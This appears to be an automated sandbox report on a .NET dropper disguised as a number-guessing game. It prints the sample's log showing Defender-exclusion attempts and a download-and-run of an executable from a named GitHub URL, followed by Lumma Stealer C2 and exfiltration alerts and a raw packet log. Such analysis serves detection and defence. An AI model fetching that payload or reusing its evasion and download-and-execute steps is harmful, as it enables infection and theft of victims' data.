SHA-512: BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low

Process: C:\Users\user\Desktop\eXbhgU9.exe
File Type: CSV text
Category: modified
Size (bytes): 1058
Entropy (8bit): 5.356262093008712
Encrypted: false
SSDEEP: 24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5: B2EFBF032531DD2913F648E75696B0FD
SHA1: 3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256: 4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512: 79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 2232
Entropy (8bit): 5.381427237108526
Encrypted: false
SSDEEP: 48:JWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:JLHyIFKL3IZ2KRH9Ougss
MD5: F92F0A6A81466A0AE1176EA8E0B118CF
SHA1: 17ECFC14C8F06E4209CEF33CC4EFBD24E722A410
SHA-256: 6079E5D353621B5ACE8D0EE0E4515A770513ADD3BB257F38760AEC6A7DF0472D
SHA-512: 164F13D8FA37537D7700F565BFD43A95A60574E587F5EDC02B01B1E507608DDE6EB2C9D82B7783147A7098B4E8FEE5B2F74035AA8DC48C36B5C883DB984E2561
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\Desktop\eXbhgU9.exe
File Type: ASCII text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 651
Entropy (8bit): 4.964269002886412
Encrypted: false
SSDEEP: 12:clyD3Cg81ye4A28scWIODMGN6TaWyL09Wy+621QYpTNIvLIj+GNT:nDp81sA8IaM7TaF094iv8j++
MD5: CE6CC66B2A3FEE1EFC9EFD5D5E6E1B0B
SHA1: 485B611193E4C6EE305C2F47CE0DA5A6D2E2FBBB
SHA-256: 5261A00FC50367D7F57DDFD53B67AA48B7CD3012D5BB361C384B127FFF59CBFC
SHA-512: A5C7F0831F7B1C39D0BF71DFB030C64F616B9C02A9F5D5CB24D2B7A85B51AB0B818D4CA65534C5F33476D4AFD0A58A607536A612A919FF655FDC250A7661D0CD
Malicious: false
Preview: Welcome to the 'Guess the Number' game!..I've picked a number between 1 and 100. Try to guess it!..Enter your guess: .Time's up! The correct number is 15...Congratulations! You guessed the number 15 in 1 attempts!..Folder 'FkSpRTrp' created successfully at C:\...Failed to add folder to Microsoft Defender exclusions. Exit code: 1..Failed to add folder 'Users' to Microsoft Defender exclusions. Exit code: 1..Downloading file from https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe.....File downloaded successfully to C:\FkSpRTrp\jyidkjkfhjawd.exe...Running file C:\FkSpRTrp\jyidkjkfhjawd.exe.....File executed successfully...

File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.03888709426846
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: eXbhgU9.exe
File size: 15'360 bytes
MD5: 9be5ac720dcf1838fd5a2d7352672f66
SHA1: d8046191a1d1756768a8bad62ce3ba757deb7d53
SHA256: cc5eb5ac7cb599572a1c9747efa83774221e0ad4a24ed6545d5bc03a44a23196
SHA512: 72f618868c9960332931d7055a4bff5b3394979a1f5d8089d51c6dc436a121a3d9332d405a3eb3f65fcb8c5930c73606e194782fcf29b46d5e42235de29acc33
SSDEEP: 384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
TLSH: 16620B44A3FC1617FABF0F386DB543450B71BA239C32EB5E24DCA48A2D267114AA0767
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x405006
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this instruction is listed 97 times in a row in the report)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4fb2 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x58c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4f28 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x300c | 0x3200 | f27795b54e7ea13f5bbe92ccf4dd102e | False | 0.478203125 | data | 5.308111270156275 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x58c | 0x600 | 6e993d30dd12afeefbd7de5ec6984ff1 | False | 0.412109375 | data | 4.002562964288917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | a94e9107db21028df50d68392e82c4ff | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6090 | 0x2fc | data | | | 0.43586387434554974
RT_MANIFEST | 0x639c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T11:59:39.044317+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.509278+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.509278+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.955988+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:40.414271+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:40.414271+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:41.382705+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:42.507623+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:43.769545+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:45.317754+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:56.966943+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49743 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:57.871611+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:57.922786+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49744 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:59.961086+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.18.19 | 443 | TCP
2024-12-30T12:00:00.427219+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 104.21.18.19 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:59:35.224191904 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.224219084 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:35.224282980 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.249867916 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.249881983 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:35.867084026 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:35.867156029 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.870848894 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.870858908 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:35.871093035 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:35.914887905 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:35.955332994 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:36.386710882 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:36.386801004 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:36.386858940 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:36.386873960 CET | 443 | 49730 | 140.82.121.4 | 192.168.2.4
Dec 30, 2024 11:59:36.386917114 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:36.393651009 CET | 49730 | 443 | 192.168.2.4 | 140.82.121.4
Dec 30, 2024 11:59:36.402988911 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.403054953 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:36.403146982 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.403538942 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.403557062 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:36.883898020 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:36.884027004 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.887250900 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.887268066 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:36.887569904 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:36.889919043 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:36.931358099 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.089418888 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.089651108 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.089741945 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.089780092 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.089901924 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.089997053 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.090040922 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.090059042 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.090096951 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.097208023 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097451925 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097513914 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.097527981 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097557068 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097783089 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097839117 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.097858906 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.097907066 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.105019093 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.150913000 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.177802086 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.178139925 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.178208113 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.178227901 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.178344965 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
Dec 30, 2024 11:59:37.178401947 CET | 49731 | 443 | 192.168.2.4 | 185.199.110.133
Dec 30, 2024 11:59:37.178411007 CET | 443 | 49731 | 185.199.110.133 | 192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178966045 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179022074 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.179030895 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179824114 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179903984 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.179912090 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180015087 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180079937 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.180088997 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180676937 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180730104 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.180738926 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185616970 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185674906 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.185684919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185797930 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185848951 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.185859919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186456919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186513901 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186523914 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186634064 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186717033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186723948 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186747074 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186785936 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186821938 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.229051113 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.229083061 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267651081 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267676115 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267693043 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267699957 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267704964 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267741919 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.267762899 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267788887 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267812967 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269355059 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269391060 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269402981 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269418955 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269426107 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269453049 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269457102 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269469976 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.275096893 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.275110960 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.275304079 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.275321960 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281559944 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281577110 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281644106 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.281656027 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.322784901 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.363965988 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.363981962 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364101887 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364123106 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364187002 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364245892 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364280939 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364310026 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364319086 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364346027 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364368916 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364526033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364541054 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364593029 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364600897 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364615917 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364634037 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364635944 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364646912 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364665985 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364706993 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.365983009 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.365997076 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.366049051 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.366058111 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.366096973 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.372253895 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372271061 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372327089 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.372335911 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372374058 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443057060 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443073034 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443393946 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443423033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443495035 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443866968 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443881989 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444061995 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444072962 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444129944 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444287062 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444300890 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444355965 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444364071 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444415092 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450280905 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450297117 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450354099 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450362921 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450406075 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450930119 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450982094 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451005936 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451014996 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451040030 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451064110 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451560020 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451575041 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451634884 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451643944 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451692104 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.452155113 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452191114 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452212095 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.452219009 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452236891 CET49731443192.168.2.4185.199.110.133
